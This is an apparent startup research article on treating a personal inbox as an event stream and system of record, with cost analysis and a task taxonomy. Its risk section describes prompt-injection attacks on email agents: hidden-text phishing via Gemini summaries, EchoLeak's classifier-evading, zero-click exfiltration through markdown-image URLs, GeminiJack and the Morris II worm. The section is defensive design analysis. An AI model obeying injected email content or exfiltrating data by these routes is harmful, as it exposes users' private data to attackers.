Email as an Event Stream and a System of Record
The frame
Joe's intuition: a personal email archive is two things at once.
- An event stream — a time-ordered log of everything that happened to a person. Every charge, delivery, deadline, breach notice, flight delay, price increase, and appointment arrives in the inbox stamped with a time. Read end to end, it is the closest thing most people have to a complete chronicle of their adult life.
- A system of record — the authoritative database of who the person is: their names and addresses, their accounts, their commitments, their relationships, their identifiers. When a dispute arises — "did I cancel that?", "what's my confirmation number?", "did they actually refund me?" — the inbox is the ground truth people reach for. Not because it was designed to be; because it is the only store that captured everything by default.
The second half of Joe's intuition is the operational one: because the inbox holds thousands of discrete facts, there are thousands of discrete tasks latent in it — refunds to chase, subscriptions to kill, deadlines to catch, money to claim. Almost none of them get done. Not because they aren't worth doing, but because the cost of doing any single one — finding it, understanding it, acting on it — has always exceeded what that one task is worth on its own. You could, in principle, sit down and run an audit of 1,000 or 5,000 distinct jobs against your inbox. Nobody does. The arithmetic never closed.
This article argues that the arithmetic just closed. The idea is old — it has a clean 80-year intellectual lineage. What is new, and new only since roughly 2023, is that a language model can read and reason about a single email for a fraction of a cent. That collapses the per-task cost below the value of the marginal task, and a whole-inbox audit becomes a positive-expected-value computation for the first time in history. Claims Genie is one task type in that audit. The inbox-agent system plan is the generalization. This article is the research backing for both.
A short history: the idea is 80 years old
The framing Joe arrived at independently has been arrived at, in pieces, by computer scientists since 1945. Two intellectual lineages developed it — and, tellingly, they barely cited each other.
1945 Vannevar Bush, "As We May Think" — the Memex: a person's
total record, associatively linked and queryable. The origin point.
|
+-- STREAM lineage (capture & navigate) --------------------+
| 1994 Steve Mann — 24/7 wearable capture |
| 1996 Freeman & Gelernter — Lifestreams: a time-ordered |
| document stream replaces the file/folder desktop |
| 2001 Bell & Gemmell — MyLifeBits: total capture into |
| a single personal SQL database ("Memex fulfilled")|
| 2007 Wolf & Kelly — Quantified Self |
| |
+-- RECORD lineage (re-find & track) -----------------------+
| 1996 Whittaker & Sidner — "Email Overload": email is |
| not a messaging app, it is a habitat where people |
| track tasks, archive, and manage commitments |
| 2003 Dumais et al. — "Stuff I've Seen": one unified |
| index over everything a person has encountered |
| 2003 Bellotti et al. — "Taking Email to Task" |
| 2007 William Jones — Personal Information Management |
| becomes a named discipline |
| 2016 Bergman & Whittaker — "The Science of Managing |
| Our Digital Stuff" |
+------------------------------------------------------------+
|
2023+ LLMs collapse the two lineages: the same raw inbox answers
both stream questions ("what happened, in order?") and record
questions ("who am I, what do I owe, what am I owed?") — with
no schema, no manual filing, no per-sender parser.
Vannevar Bush, "As We May Think" (The Atlantic, July 1945). Bush proposed the Memex: a device in which "an individual stores all his books, records, and communications... mechanized so that it may be consulted with exceeding speed and flexibility... an enlarged intimate supplement to his memory." Bush had the framing exactly right and the bottleneck exactly wrong. He assumed the hard problem was the storage and retrieval machinery. The hard problem turned out to be semantic understanding of the content — and that is precisely the part LLMs now solve.
Lifestreams — Eric Freeman & David Gelernter, Yale (1996). Freeman and Gelernter proposed throwing out the file/folder/desktop metaphor entirely and replacing it with a single chronologically-ordered stream of every document a person ever created or received ("Lifestreams: A Storage Model for Personal Data," ACM SIGMOD Record 25:1, March 1996; Freeman's PhD thesis, Yale, 1997). Their core claim — that time-order is the natural index for personal data, because people remember when things happened more reliably than where they filed them — is correct and still underappreciated. It is also exactly how Gmail's "all mail + search" model works in practice. Lifestreams is the direct ancestor of "email as event stream." Its limitation: it had no semantic understanding, so the user still had to hand-build every filter. An LLM is the filter.
MyLifeBits — Gordon Bell & Jim Gemmell, Microsoft Research (2001–2009). Bell, a computing legend (he led DEC's VAX), made himself the experimental subject of a total-capture project: every document, photo, email, web page, phone call, and meeting into one personal SQL database. The 2006 Communications of the ACM paper is titled, with no hedging, "MyLifeBits: A Personal Database for Everything." The project explicitly positioned itself as fulfilling Bush's Memex. This is the cleanest prior statement of "email as system of record" — except they tried to build the database deliberately, with custom capture hardware. The accidental version already exists in everyone's Gmail. What MyLifeBits lacked, and what its own authors (Sellen & Whittaker, "Beyond Total Capture," CACM 2010) later identified as the fatal gap, was curation: a giant captured archive that nobody can usefully query is a junk drawer. LLMs are the curation layer that was missing.
Stuff I've Seen — Susan Dumais et al., Microsoft Research (SIGIR 2003). A unified index over everything a user had encountered — email, web, documents, calendar — with the insight that contextual cues (who sent it, when, what thread) make personal-archive search fundamentally different from web search. Deployed to 230+ Microsoft employees. Still keyword-based; the question it could not answer was the semantic one — "find every email where someone made me a commitment with a deadline." That is now a one-line prompt.
Email-as-habitat — the PIM lineage (1996–2016). Whittaker & Sidner's "Email Overload" (CHI 1996) is the founding empirical paper: they studied 20 users' archives and found email had been overloaded far past its design — it was being used as a task manager, a document archive, a contact database, and a commitment tracker. Ducheneaut & Bellotti sharpened the metaphor in 2001: email is a habitat, the place knowledge workers actually live. Bellotti et al.'s "Taking Email to Task" (CHI 2003) built a client that treated the inbox explicitly as an action queue. Whittaker, Bellotti & Gwizdka (CACM 2006) documented that the average user's folder count grew from 47 (1996) to 133 (2006) — the inbox visibly metastasizing into a personal database. William Jones made Personal Information Management a named discipline (Keeping Found Things Found, 2007); Bergman & Whittaker wrote the field's synthesis (The Science of Managing Our Digital Stuff, MIT Press, 2016).
The PIM literature treats "email is the de facto personal system of record" as so obvious it states it as background, never as a finding. That is the tell. Everyone who has studied how people actually use email already knows it is their database. Nobody could do anything useful with that fact at scale, because the only tool for reading 50,000 emails was 50,000 units of human attention.
The synthesis nobody reached. The stream lineage and the record lineage developed in near-isolation. What neither anticipated: an LLM sitting on a raw inbox collapses the distinction. The same corpus answers "what happened to me, in order?" (stream) and "what is my current address / what did I commit to / what am I owed?" (record) — with no schema, no user-built filing structure, and no per-sender parser. Joe's two-primitives framing is the synthesis the literature never wrote down.
What "LLMs on email" actually means in 2026 — and what it conspicuously does not do
The space of products that point AI at email is real and crowded. But it is worth being precise about what they do, because there is a large, obvious gap, and Claims Genie / the inbox-agent plan sits squarely in it.
| Product | What the AI does over the corpus | Corpus access | Autonomous action? |
|---|---|---|---|
| Shortwave | Full RAG: bi-encoder retrieval + GPU cross-encoder re-rank + LLM synthesis; natural-language Q&A over entire history; thread summary; voice-matched drafts | Full inbox, Gmail OAuth | Draft only |
| Superhuman | Voice-learned drafting, semantic search, AI auto-labels, auto-archive, follow-up nudges | Full inbox, OAuth | Auto-archive / auto-label |
| Gmail (Gemini) | Summarize thread, "Help me write", inbox prioritization, cross-inbox Q&A (paid tier), per-email summary cards | Full inbox, on-Google | Assistive only |
| Notion Mail | LLM classification + auto-sort into topic folders | Full inbox, OAuth | Auto-sort |
| Fyxer / Serif | Triage into buckets, voice-learned reply drafts, meeting transcription | Full inbox, OAuth | Label / categorize |
| SaneBox | Header-only behavioral triage (does not read content) | Headers only, IMAP | Move to folders |
| Apple Intelligence | On-device thread summary + priority messages | Device-local | None |
| MS 365 Copilot | Summarize, draft, cross-Graph Q&A, RSVP automation | Inbox + full M365 Graph | RSVP automation |
| Lindy | Configurable autonomous agent: triage, draft, schedule, extract action items, send | Full inbox, OAuth | Yes — including send |
Every product in that table optimizes the same loop: help the user process incoming mail faster — read it, triage it, summarize it, reply to it. That is the "email overload" problem the 1996 PIM literature named, and 30 years later it is still what the entire industry is building for. It treats the inbox as a flow to be drained.
Almost nobody treats the inbox as a corpus to be mined. The distinction is the whole point:
- Draining the flow asks: what is the fastest path to inbox zero?
- Mining the corpus asks: what is true about this person, and what is owed to or by them, given everything that ever arrived?
The handful of products that mine do exactly one vein and stop. TripIt parses travel confirmations — one document type, hand-written per-airline parsers since ~2011. Rocket Money detects subscriptions — but from bank transactions, not email, so it never sees the trial start date or the price-change history that lives only in the inbox. Unroll.me enumerates newsletter senders — and infamously, when Slice Intelligence owned it (2017), monetized the receipt data by selling Lyft ride receipts to Uber, the canonical cautionary tale of "we needed broad inbox access for feature X, so we sold everything else." Have I Been Pwned checks an address against breach lists — but cannot tell you which of your accounts was the leak source. Each was built when per-email reasoning was expensive, so each could only justify the engineering for one high-uniformity document type. None generalizes, because "is there a regex for "did this person promise to introduce Alice to Bob and then never do it"?" — no, there is not, and that is the point.
The research benchmarks confirm both the opportunity and the ceiling. EnronQA (arXiv:2505.00263, May 2025 — 103,638 emails, 528,304 Q&A pairs over 150 real inboxes) found GPT-4o + BM25 retrieval answers direct questions over a personal email corpus at 81.2% accuracy — strong, genuinely useful, and not reliable enough to act on unreviewed. WorkBench (arXiv:2405.00823, 2024 — 690 realistic workplace tasks) found GPT-4 completed 43% of multi-step email/calendar tasks, and warned the failures were not benign: agents sent email to the wrong person. The capability is real. The reliability is mid. That gap is a design constraint, not a disqualifier — and it dictates the autonomy ladder discussed below.
The unit economics: why the audit is rational now and was not in 2022
This is the load-bearing section. The thesis is not "LLMs are smart enough." It is "LLMs are cheap enough" — the cost of running one small reasoning job against one email has fallen below the value of the marginal task in a 5,000-task audit.
The price collapse, quantified. GPT-4-class capability cost ~$36 per million input tokens at launch (March 2023). By 2026 the same capability is available below ~$0.40 per million — roughly a 90× drop in under three years. Epoch AI's analysis puts the trend at ~10× per year, faster than Moore's Law; a16z calls it "LLMflation." For email-class work the relevant model is a small fast one — Claude Haiku 4.5 at ~$0.80 / $4.00 per million input/output tokens; GPT-4o-mini at $0.15 / $0.60.
Cost to read one email. A typical email with thread context is 1,000–3,000 tokens. To classify and extract structured JSON from one email at Haiku rates costs on the order of $0.0002–$0.0006 — a few hundredths of a cent. Schema-constrained generation (pass a Pydantic/JSON schema, get reliable structured output back) makes this a routine, boring operation rather than a research project.
Cost to audit a whole life. A 10-year inbox at average density is ~8,000 stored messages; a heavy user runs 50,000–200,000.
| Inbox size | Full classify + extract sweep (Haiku-class) |
|---|---|
| 8,000 emails | $1.60 – $4.80 |
| 100,000 emails | $0.25 – $1.00 (input) + ~$0.20 (output) ≈ under $1.50 |
Run a stronger model on just the flagged 5% that need judgment, add ~$1. The whole-life audit costs $5–$15 in inference, once. That is not an estimate hedged with assumptions — it is direct arithmetic from published API prices.
What the audit replaced. Before 2023 there were three ways to extract structured meaning from an email, and all three priced the audit out:
| Method | Cost per email | Why it failed the audit |
|---|---|---|
| Human attention | 10–30 sec, ≈ $0.10–$0.25 at minimum wage | 8,000 emails = ~66 hours = $560+. Nobody does 66 hours of unpaid forensic inbox work for a diffuse payoff. |
| Hand-written parser | ~$0 to run, weeks to build | Works only on known-format senders; breaks on a layout change; needs per-sender engineering. Justifiable for one uniform document type (TripIt), never for 5,000 heterogeneous tasks. |
| Pre-LLM ML classifier | cheap to run | Needs labeled training data per category; breaks on out-of-distribution senders. |
| Zero/few-shot LLM (2023+) | $0.0002–$0.0006 | Works on any sender, any format, any language, no training data, returns structured JSON. |
The shape of the shift. The old world had a hard cost floor under every task: the cheapest possible unit of "understand this email and decide if it's worth acting on" was a unit of human attention, and human attention is never free. That floor meant only crisis-grade tasks cleared the bar — the notice that screamed loudly enough to demand action got done; the other 4,990 quietly worth $3–$200 each did not. The LLM removes the floor. When the marginal task costs $0.0005 to evaluate, you stop triaging which tasks are worth checking and just check all of them. The audit stops being a project and becomes a sweep.
This is also why the business model works. The aggregate value latent in one ordinary American adult's inbox — across unclaimed property ($70B in US state escheatment pools, average claim $1,610), unfiled class-action claims (claim rates of 9% or worse), zombie subscriptions ($204/yr average forgotten spend), forfeited FSA funds ($4.5B/yr nationally), unredeemed rebates and gift cards ($21B+ in gift cards alone) — runs to hundreds, often thousands, of dollars. Spending $10 of inference to surface that is a rounding error. Claims Genie's pricing thesis — we get paid only after the user gets paid — is only viable because the scan cost is negligible against the recovery.
The unbuilt task list: what a 5,000-job inbox audit actually contains
Joe's "you could go through and do a thousand or five thousand different tasks" is not rhetorical. Here is the taxonomy, with the concrete jobs and the real numbers behind them. The marks follow the inbox-agent plan: ★ recovers a concrete dollar figure (fits performance pricing), ◐ saves money (priceable as a cut of savings), ○ real value but no payout to clip.
1. Money already yours — recovery ★
The inbox holds the proof and the event; the task is find proof + detect event + do paperwork.
- Class-action settlements — current Claims Genie product. ~$42B in settlements reached in 2024; claim rates of 9% or less, dropping to ~3% on email-only notice, with some consumer cases under 0.03%.
- Unclaimed property — $70B held by US states, ~1 in 7 Americans, average claim $1,610. The signal is indirect: the inbox names the employers, banks, and utilities that may have escheated property on the user's behalf.
- Lost / orphaned retirement accounts — multi-employer 401(k) scatter. Joe's own inbox (per the inbox-agent plan) shows 401(k)s at two staffing employers across Fidelity and Milliman, 6+ Fidelity account numbers, a $45,429 rollover — a textbook consolidation case sitting in plain sight.
- Forgotten balances — gift cards ($21B+ unredeemed nationally), store credit, loyalty points (McKinsey estimated 30 trillion unredeemed airline miles; some programs redeem only 8%).
- Refund reconciliation — "advance refund" emails ("we may re-charge if not verified"), flight refund tracking (did all three Alaska refund files actually land?), flight delay/cancellation compensation eligibility.
- Recalled-product refunds — match CPSC/NHTSA recall notices against actual purchase confirmations. Only ~1 in 5 Americans know they own a recalled product.
- Rebates ($500M–$2.4B/yr unredeemed), fee refunds (overdraft/ATM/late), deposits owed back (26% of renters have lost a deposit), warranty claims (55% of extended warranties bought are never used), unfiled FSA/HSA reimbursements ($4.5B/yr forfeited), sign-up bonuses not credited.
2. Money quietly flowing out — leak-stopping ◐
- Subscription cancellation — the killer signal. Average American spends $219/mo on subscriptions but believes it's $86; 42% admit to a fully-forgotten-but-still-charging subscription. Joe's own inbox shows 25–35 active paid subscriptions and him manually fighting Artlist support for a refund — doing this job by hand, today.
- Duplicate / overlapping services — four overlapping AI assistants, four overlapping video services.
- Price-increase interception — catch the "your plan is changing to $X" email before autopay fires.
- Free-trial → paid interception — 70% of people have forgotten to cancel a trial.
- Unused-value detection — subscriptions with no usage signal for 90+ days.
- Bill negotiation, insurance overpayment, auto-renewal interception.
3. Never miss a deadline — vigilance ○
Bill due dates, return windows, warranty/rebate/trial/gift-card expirations, registration/passport/license renewals, business-entity compliance (the biennial-statement obligation for an incorporated entity), legal and court notices, tax deadlines.
4. Identity & exposure mapping ○
- Complete account inventory — every "welcome to X" email, deduplicated, first-seen dated. A 25-year email user has opened 500–2,000 accounts.
- Breach exposure — 2025 saw 3,322 US data compromises, 278M+ people affected; map which specific accounts were the leak source (the thing HIBP cannot do).
- Accounts at acquired or defunct companies, accounts never properly closed, payment-card exposure map (which companies store a card directly), the full marketing opt-in ledger.
5. Tax & financial artifacts ★/○
Charitable-donation receipts (the most commonly disqualified deduction — and every donation platform emails an exact-amount confirmation), 1099/W-2/1099-K arrival tracking (flag the form that never showed), cost-basis records for sold assets (often the only surviving record for pre-2014 or defunct-exchange holdings), business expenses buried in personal mail, HSA-eligible receipts paid out of pocket and still reimbursable.
6. Relationships & social ○
Explicit commitments made in threads ("I'll send that Friday", "let's grab coffee", "I'll introduce you to —"), unanswered mail from high-frequency contacts, birthdays/anniversaries mentioned in passing, RSVPs never sent, introductions made but never followed up, contacts gone cold after a warm thread.
7. Health ★/○
Provider relationship catalog, EOB-vs-invoice reconciliation (duplicate and surprise bills are common), prescription/refill history, lab-result notifications with no follow-up appointment within 30 days (a possibly-ignored abnormal result), open-enrollment confirmations, the 60-day COBRA window after a job change.
8. Consumer protection & product lifecycle ★/○
Cross-reference every purchase confirmation against CPSC and NHTSA recall databases; product-registration reminders; defect class memberships; "firmware update required for safety" notices for connected devices.
Does "5,000 tasks" hold? For a 10-year inbox, a conservative count:
| Category | Extractable data points | Items warranting action |
|---|---|---|
| Money / claims | 800–1,200 | 40–180 |
| Subscriptions | 50–200 | 50–200 |
| Deadlines / obligations | 300–600 | 30–100 |
| Identity / exposure | 500–2,000 | 50–300 |
| Tax artifacts | 200–500 | 20–50 |
| Relationships | 1,000+ | 20–100 |
| Health | 100–400 | 10–50 |
| Product lifecycle | 200–500 | 10–50 |
| Total | ~3,500–6,500 | ~250–1,000 |
The "thousands of tasks" claim is, if anything, conservative — and it counts only decision tasks, not the background enrichment (account graph, relationship graph, cost-basis ledger) that has standalone value. Joe's instinct that "a person might not think to do or might put off" most of these is exactly right: every one of them is individually too small to schedule and too tedious to enjoy, which is the precise profile of work to hand to an agent.
The risk surface: pointing an LLM at a whole inbox is not free
The thesis is sound, but the inbox is the most dangerous corpus to point an agent at, for four independent reasons. None of them kills the idea. All of them shape the architecture.
1. Prompt injection — the inbox is an attacker-controlled input channel. This is the central, structural risk. Simon Willison's "lethal trifecta" names the condition precisely: an agent that has (a) access to private data, (b) exposure to untrusted content, and (c) the ability to exfiltrate is exploitable — and an inbox agent has all three by design. The attacks are not theoretical:
- Gemini-in-Gmail hidden-text phishing (Mozilla 0din, 2024–2025): an attacker emails white-on-white, zero-font-size text wrapped in
<admin>tags; when the victim clicks "summarize," Gemini faithfully renders the attacker's fake "your password is compromised, call this number" warning. No link, no attachment — nothing a spam filter catches. - EchoLeak / CVE-2025-32711 (Aim Labs, June 2025, CVSS 9.3): a single email, zero clicks, exfiltrated M365 Copilot users' Outlook/OneDrive/SharePoint data — the injection was phrased in plain natural language to slip past Microsoft's injection classifier, and the data left via a markdown-image URL the client auto-fetched.
- GeminiJack (Noma, 2025): a poisoned shared doc/email caused Gemini Enterprise to exfiltrate across Gmail, Calendar, and Docs at once.
- Morris II (2024): the first self-propagating prompt-injection worm, using email injection as its access vector.
NIST calls indirect prompt injection "generative AI's greatest security flaw"; it is #1 on the 2025 OWASP LLM Top 10. Classifier defenses keep losing to natural-language obfuscation.
2. Exfiltration paths. Three demonstrated vectors: markdown-image auto-fetch (data rides in the URL query string — EchoLeak, GeminiJack), agent tool calls to attacker URLs, and the agent itself sending mail out. This is why the read-only-scope choice matters: gmail.readonly (Claims Genie's scope) eliminates the "agent emails data out" and "agent deletes evidence" paths outright. It does not close the markdown-beacon path — that has to be closed by sanitizing the agent's output before anything renders it.
3. The inbox is a lossy and adversarial system of record. This is the reliability problem and it has no clean technical fix because it is a property of the data, not the agent. Contact/profile data decays 20–30% per year. Most people have 2–4 inboxes, so any single one is a partial view — and the agent will not know what it is missing or calibrate its confidence to its actual recall. A phishing email imitating Chase looks more "transactional" than real Chase marketing. An LLM that extracts "your address is 123 Main St" from a 2014 Amazon receipt and pre-fills a 2026 form has made a confident, plausible, wrong decision. The 81.2% EnronQA ceiling is the quantified version of this: roughly one in five answers is wrong, and the model cannot tell you which one.
4. The structured profile is more dangerous than the raw mbox. This is the aggregation risk, and it is the subtle one. A raw inbox is large, messy, and slow for an attacker to exploit. The clean JSON profile an LLM produces — full name, prior names, current and prior addresses, PayPal/Venmo/Zelle handles, account IDs, relationships — is immediately actionable for identity theft, account takeover, and SIM-swapping. The UK NCSC codifies this as a named security principle ("avoid putting too much sensitive data together"). The uncomfortable corollary: the most valuable exfiltration target in the system is the agent's own output, not its input. That is a direct argument for the inbox-agent plan's hard exclusions (never store SSN, bank routing, card PAN, government IDs, credentials — already in the Claims Genie CLAUDE.md) and for keeping the structured store encrypted at rest (SQLCipher is already live on Prometheus).
5. Provider policy is a real constraint, not a footnote. Google's API Services User Data Policy and the 2023 Workspace generative-AI update are explicit: Gmail data may be used only for the user-facing feature the user authorized; it may not train models beyond a per-user personalization; it may not be transferred or sold to third parties — even aggregated, even with consent. gmail.readonly is a "Sensitive" scope (OAuth verification + explicit disclosure); gmail.modify is "Restricted" and triggers an annual paid CASA security assessment. The existing data-sovereign-email.md research article in this repo covers the downstream consequence: the Limited Use policy is why a user cannot share in the value of their own Gmail-derived data while that mail lives at Google — and why true data sovereignty starts at the mailbox.
Mitigations that actually work today, in rough order of leverage: read-only scopes; on-device / local inference (the inbox-agent plan's choice to run the digest/classify step on a local DGX Spark model means raw inbox text never leaves the box for those steps); the dual-LLM pattern (a privileged planner that never sees untrusted content + a quarantined reader that has no tools — Willison, 2023; DeepMind's CaMeL, 2025, is the capability-enforced descendant, neutralizing ~67% of injections in testing); markdown/link sanitization of agent output; and human-in-the-loop gates on any irreversible action. The unsolved residue: injection-classifier defenses lose to novel phrasing, and the lossy-data problem has no fix at all — it can only be surfaced (show provenance and a confidence/staleness flag on every extracted fact) rather than eliminated.
What this means for Claims Genie
Claims Genie is not a separate product from this thesis — it is the first task type in the audit. It already does the hard 80%: read-only Gmail OAuth, recall-biased inbox scanning, Haiku-class classification at scale, structured extraction into a per-settlement profile, a file-based per-user work queue, and a pricing model (pay only after the user is paid) that is only viable because the scan cost is negligible. The settlement is one ★ recovery task. The inbox-agent system plan is the generalization Joe has already scoped: data/users/<id>/auto-file/ becomes data/users/<id>/tasks/<id>/, and file-settlement becomes one kind among cancel-subscription, refund-hunt, flight-comp, find-old-401k, collect-tax-docs, deadline-watch.
Three things this research firms up about that plan:
- The framing is validated, not speculative. "Inbox as event stream + system of record" is the synthesis the academic literature circled for 80 years without naming. Joe arrived at it independently. That is a good sign it is real.
- The unit economics are the moat, and they are timing-sensitive. The reason no incumbent does the whole-inbox audit is that the products were built when per-email reasoning was expensive, so each could justify only one vein. The window to be the cross-category auditor is open because of the price collapse — and the same collapse means a competitor can enter on the same economics. Speed matters.
- The autonomy ladder is forced by the reliability ceiling. 81.2% Q&A accuracy and benchmark agents emailing the wrong person mean the plan's
observe → draft → autoladder is not conservatism for its own sake — it is the correct response to a measured error rate. Default todraft. Reserveautofor tasks that are both reversible and verifiable. Treat the inbox as evidence to propose from, never as ground truth to act on unreviewed — and put a provenance + staleness flag on every extracted fact, because the data source guarantees some of them are wrong.
Open questions
- Per-user economics at scale. $5–$15 of inference per full-life audit is the classification cost. The agentic web steps (logging into a retailer to claim a refund, navigating an escheatment portal) are Claude-on-Stagehand sessions that cost meaningfully more and can fail. What is the true blended cost per completed task, and which task kinds clear a performance-pricing bar?
- The reliability gate. 81.2% accuracy is fine for "here are subscriptions worth reviewing" and unacceptable for "we auto-cancelled this." Where exactly does each task
kindsit on the observe/draft/auto ladder, and what is the verification step for each? - Provider-policy exposure. Generalizing from settlement-filing to a broad inbox audit stores more structured personal data for more purposes. Does that stay inside Google's "only the feature the user authorized" Limited Use boundary, or does the consent surface and scope story need to be rebuilt before this ships? (This is the security/Gmail-OAuth blast-radius zone the Claims Genie CLAUDE.md flags as needing real review.)
- Where injection actually bites. Claims Genie's read-only scope plus local-model digest closes most paths. But the moment an agentic step has a browser and a login, the trifecta is complete. What is the sandbox boundary for the Stagehand sessions?
- The multi-inbox blind spot. One Gmail is a partial view. Is single-inbox coverage good enough for v1, and how is the user told what the agent cannot see?
- Does the user want the whole audit, or is it uncanny? A scan that returns "here are your 30 subscriptions, your orphaned 401(k), and the lab result you never followed up on" is enormously valuable and also slightly unsettling. The Duolingo-style, one-thing-at-a-time, celebrate-every-win UX philosophy in the Claims Genie product guide is probably the answer — surface the audit as a stream of small wins, not a single wall-of-truth report — but that is a design hypothesis to test, not a settled answer.
Sources
Prior art: Bush, "As We May Think" (The Atlantic, 1945); Freeman & Gelernter, "Lifestreams: A Storage Model for Personal Data" (ACM SIGMOD Record 25:1, 1996); Gemmell, Bell & Lueder, "MyLifeBits: A Personal Database for Everything" (CACM 49:1, 2006); Bell & Gemmell, Total Recall (Dutton, 2009); Dumais et al., "Stuff I've Seen" (SIGIR 2003); Whittaker & Sidner, "Email Overload" (CHI 1996); Bellotti et al., "Taking Email to Task" (CHI 2003); Whittaker, Bellotti & Gwizdka, "Email in Personal Information Management" (CACM 49:1, 2006); Jones, Keeping Found Things Found (Morgan Kaufmann, 2007); Bergman & Whittaker, The Science of Managing Our Digital Stuff (MIT Press, 2016); Sellen & Whittaker, "Beyond Total Capture" (CACM 53:5, 2010).
LLM-on-email & benchmarks: Shortwave engineering blog; OpenAI × Superhuman; Google "Gmail enters the Gemini era"; EnronQA (arXiv:2505.00263); WorkBench (arXiv:2405.00823); Simon Willison, "LLM schemas" (2025) and the lethal-trifecta / dual-LLM essays.
Economics: Epoch AI LLM inference price trends; a16z "LLMflation"; Anthropic + IntuitionLabs 2025–2026 API pricing.
Statistics: NAUPA / state unclaimed-property data; class-action claim-rate studies (Duke Judicature); Self Financial and ReSubs subscription studies; Money on FSA forfeiture; CNN on unredeemed gift cards; Consumer Reports / CPSC on recall awareness; HIPAA Journal / CNBC on 2025 data breaches.
Risk: Willison, "The lethal trifecta" (2025) and "The Dual LLM pattern" (2023); CVE-2024-5184 (EmailGPT); Mozilla 0din Gemini/Gmail phishing disclosure; CVE-2025-32711 (EchoLeak, Aim Labs); Noma Security GeminiJack; DeepMind CaMeL (arXiv:2503.18813) and "Lessons from Defending Gemini" (arXiv:2505.14534); Google API Services User Data Policy & 2023 Workspace generative-AI policy update; UK NCSC data-aggregation principles. See also the companion article data-sovereign-email.md in this repo.